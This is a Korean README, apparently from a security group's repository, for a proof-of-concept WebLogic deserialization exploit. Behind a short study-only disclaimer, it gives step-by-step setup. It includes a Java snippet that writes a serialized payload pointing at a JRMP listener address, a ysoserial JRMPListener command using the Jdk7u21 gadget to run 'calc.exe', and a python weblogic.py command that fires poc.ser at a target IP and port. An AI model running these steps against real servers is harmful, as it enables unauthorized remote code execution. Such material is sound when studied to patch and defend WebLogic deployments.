
0-sec.org
오직 학습 및 교류 용도로만 사용하십시오. 다른 용도로 사용 시 발생하는 모든 책임은 사용자 본인에게 있습니다.
관련 jar 파일들을 모두 프로젝트에 가져왔으며, 공격 방식은 yso의 JRMP를 사용합니다. 학습 및 디버깅 시 공격 방식을 수정할 수 있습니다.
먼저 weblogic 폴더 아래의 SerializedSystemIni.dat 파일을 security 폴더에 넣어야 합니다.
그런 다음 yso를 ysoserial.jar 로 이름을 변경하고 lib 디렉토리에 가져와야 합니다.

다음으로 weblogic/wsee/jaxws/persistence/PersistentContext.java 의 getObject 메서드에 있는 IP 주소와 포트를 설정합니다.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
마지막으로 원격에서 JRMP 수신기를 통해 7u21 명령 실행을 이용합니다.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
사용 방법: Poc.java를 실행하여 poc.ser 직렬화 파일을 생성한 후 다음 명령어를 사용합니다.
python weblogic.py ip port poc.ser

